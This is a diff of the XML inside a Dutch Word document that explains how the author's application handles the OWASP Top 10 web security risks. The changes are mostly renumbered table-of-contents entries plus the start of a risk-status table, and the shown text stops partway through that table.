-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011046 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881055 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1336,7 +1406,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1359,7 +1429,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011047" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881056" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1386,7 +1456,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011047 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881056 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1406,7 +1476,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1429,7 +1499,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011048" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881057" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1456,7 +1526,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011048 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881057 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1476,7 +1546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1499,7 +1569,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011049" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881058" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1526,7 +1596,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011049 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881058 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1546,7 +1616,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1569,7 +1639,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011050" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881059" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1596,7 +1666,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011050 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881059 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1616,7 +1686,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1639,7 +1709,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011051" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881060" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1666,7 +1736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011051 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881060 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1686,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1709,7 +1779,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011052" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881061" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1736,7 +1806,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011052 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881061 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1756,7 +1826,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1779,7 +1849,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011053" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881062" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1806,7 +1876,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011053 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881062 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1826,7 +1896,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1849,7 +1919,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011054" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881063" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1876,7 +1946,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011054 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881063 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1896,7 +1966,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1919,7 +1989,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011055" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881064" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1946,7 +2016,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011055 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881064 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1966,79 +2036,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-          <w:bookmarkEnd w:id="0"/>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-              <w:noProof/>
-              <w:lang w:eastAsia="nl-NL"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011056" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011056 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2061,12 +2059,82 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011057" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881065" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881065 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="nl-NL"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc42881066" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t>Hoe heb ik dit opgelost?</w:t>
             </w:r>
             <w:r>
@@ -2088,7 +2156,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011057 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881066 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2108,7 +2176,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>10</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2131,7 +2199,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011058" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881067" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2158,7 +2226,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011058 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881067 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2178,7 +2246,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2201,7 +2269,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011059" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881068" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2228,7 +2296,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011059 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881068 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2248,7 +2316,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2271,7 +2339,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011060" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881069" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2298,7 +2366,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011060 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881069 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2318,7 +2386,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2341,7 +2409,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011061" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881070" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2368,7 +2436,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011061 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881070 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2388,7 +2456,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2411,7 +2479,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011062" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881071" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2438,7 +2506,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011062 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881071 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2458,7 +2526,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2481,7 +2549,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011063" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881072" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2508,7 +2576,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011063 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881072 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2528,7 +2596,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2551,7 +2619,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011064" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881073" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2578,7 +2646,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011064 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881073 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2598,7 +2666,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2621,7 +2689,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011065" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881074" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2648,7 +2716,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011065 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881074 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2668,7 +2736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2691,7 +2759,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011066" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881075" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2718,7 +2786,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011066 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881075 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2738,7 +2806,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2761,7 +2829,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011067" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881076" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2788,7 +2856,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011067 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881076 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2808,7 +2876,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2831,7 +2899,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011068" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881077" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2858,7 +2926,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011068 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881077 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2878,7 +2946,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2901,7 +2969,7 @@
               <w:lang w:eastAsia="nl-NL"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc42011069" w:history="1">
+          <w:hyperlink w:anchor="_Toc42881078" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2928,7 +2996,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc42011069 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc42881078 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2948,7 +3016,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2974,38 +3042,386 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc42011029"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc42881037"/>
       <w:r>
         <w:t>Top 10 Web Application Security Risks</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In dit document leg ik uit hoe OWASP wordt toegepast binnen mijn applicatie. Hierbij gebruik ik de top 10 meest voorkomende beveiligingsresico’s.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> In dit document ga ik niet laten zien hoe er misbruik van deze hacks kan worden gemaakt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> binnen mijn eigen applicatie wel geef ik algemene voorbeelden. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc42881038"/>
+      <w:r>
+        <w:t>Risk analyse</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>In dit document leg ik uit hoe OWASP wordt toegepast binnen mijn applicatie. Hierbij gebruik ik de top 10 meest voorkomende beveiligingsresico’s.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> In dit document ga ik niet laten zien hoe er misbruik van deze hacks kan worden gemaakt</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> binnen mijn eigen applicatie wel geef ik algemene voorbeelden. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>in</w:t>
-      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc42011030"/>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve">Hieronder is een makkelijke te overzien tabel die alle verwerkte security risk weergeven. </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="GridTable4-Accent5"/>
+        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="96"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4531"/>
+        <w:gridCol w:w="4531"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Security Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Verwerkt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Injection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Broken Authentication</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
